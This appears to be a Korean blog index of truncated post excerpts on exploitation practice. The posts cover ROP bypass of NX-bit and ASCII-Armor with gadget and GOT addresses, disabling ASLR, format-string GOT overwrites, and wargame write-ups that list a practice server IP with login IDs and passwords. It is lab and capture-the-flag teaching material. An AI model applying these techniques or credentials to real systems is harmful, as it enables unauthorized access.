나중을 대비하여.. Bypass Nx-Bit and ASCII-Armor 부분을 파이썬을 이용하여 짜봤음. Fedora Core-13, ASLR은 꺼져있는 상태임. system -> 0x67bbf0 strcpy -> 0x8048358 -> \x58\x83\x04\x08 puts -> 0x08048388 -> \x88\x83\x04\x08 GOT_puts -> 0x8049748 -> \x48\x97\x04\x08 pop2ret -> 0x08048568 -> \x68\x85\x04\x08 0xf0 -> 0x80486ec -> \xec\x86\x04\x08 0xbb -> 0x8048753 -> \x53\x87\x04\x08 0x67 -> 0x8048754 -> \x54\x87\x04\x08 0x00 -> 0x..
NX-Bit와 ASCII-Armor 우회하기 ( ROP기법 초급 ) 환경 : Fedora Core - 13 원래 Full-ASLR 기법이 적용되어 있지만 사용안함 설정 해놨음. [root@localhost bypass-NX_and_ASCII]# echo 0 > /proc/sys/kernel/randomize_va_space[root@localhost bypass-NX_and_ASCII]# cat /proc/sys/kernel/randomize_va_space0 취약점이 있는 코드 // gcc -o vuln vuln.c -fno-stack-protector -fno-pie -mpreferred-stack-boundary=2// 코드가 약간 억지스럽지만 단순히 실습용이기 때문에 상관없음 #include #i..
######################################## 포맷 스트링 취약점을 이용하여 쉘을 획득하라 IP : 175.119.227.56 PORT : 10222 ID : system400 PW : YLDMfUUmSwMK ######################################## 당연히 포맷스트링 문제일 것이다. 문제를 보도록 하자. -bash-4.1$ ls -ltotal 800-r-sr-x--- 1 root400 system400 6316 Apr 8 2014 system400-r-sr-x--- 1 root400 system400 537 Apr 8 2014 system400.c system400.c를 통해 어디에 FSB 취약점이 있는지 확인하도록 하자. #include #in..
################################################## 문제 제목 : 확률 게임에서 이겨라! 문제 설명 : 확률 게임이 있다. 이 게임은 1에서 100중 숫자를 선택하여 컴퓨터가 선택한 값과 일치 해야 된다. 일치하면 잭팟이 터지고 SHELL을 획득 할 수 있다. 게임에서 이겨라! 접근 IP : 175.119.227.56 접근 PORT : 10222 접근ID : system200 접근 PW : securitypractice ################################################## 설명만 본다면 단순한 확률게임인것 같다. 서버에 접속해보면 역시 system200이라는 파일이 있다. -bash-4.1$ lltotal 16-r-sr-x---..
############################################ 개발자는 메아리 프로그램을 제작 하였다. 허나 어설픈 보안 설정으로 해당 프로그램의 취약 점이 존재 한다. 취약점을 찾아서 SHELL을 획득 하여라. 접근 IP : 175.119.227.56 접근 PORT : 10222 접근ID : system100 접근 PW : !kisa_system_gogosing~!!! ############################################ 일단 서버에 접속하게 되면 -bash-4.1$ ls -ltotal 8-r-sr-x--- 1 root100 system100 7841 Apr 7 2014 system100 system100이라는 파일이 보인다. 실행파일이며 위에서 말하는 메아..
환경은 Kali 리눅스 입니다. --------------------------------------------------- 칼리 리눅스 ASLR끄기 ASLR이란 Address Space Layout Randomization의 약자로서 공격자가 제대로 된 RET를 구하기 힘들게 만들기 위해 모든 영역을 랜덤화 하는 메모리 보호기법이다. root@Kali:~# ls /proc/sys/kernel/ | grep randomize randomize_va_space -> ASLR옵션을 끄고 키는 파일 root@Kali:~# sysctl -w kernel.randomize_va_space=2 kernel.randomize_va_space = 2 현재 힙 + LIBC + 스택영역까지 모두 보호 1은 힙을 제외한 L..
FSB로 GOT OVERWRITE하기 실습환경 ->LOCAL FTZ( RED HAT9 ) ---------------------------------------------------------------- [guest@ftz sys]$ whoami guest -> 나의 게정은 guest이다. [guest@ftz sys]$ ll total 32 -rwsr-xr-x 1 root root 11675 Aug 6 08:10 fsb_got //root의 setuid가 걸려있음 -rw-r--r-- 1 root root 179 Aug 6 08:19 fsb_got.c [guest@ftz sys]$ cat fsb_got.c #include #include int main( int argc, char **argv ) { c..
printf_got.c #include int main( void ) { printf( "cat ~/system_hack_test/got_test.txt" ); return 0; } 이 코드를 통해 /root/system_hack_test/got_test.txt를 출력해야함. 여기서 printf가 system함수가 되면 출력할 수 있음. root@Kali:~/system_hack_test# pwd /root/system_hack_test root@Kali:~/system_hack_test# ls -l 합계 28 -rwxrwxrwx 1 root root 5204 9월 6 14:54 got_test -rw-r--r-- 1 root root 300 9월 6 14:54 got_test.c -rw-r--r-- 1..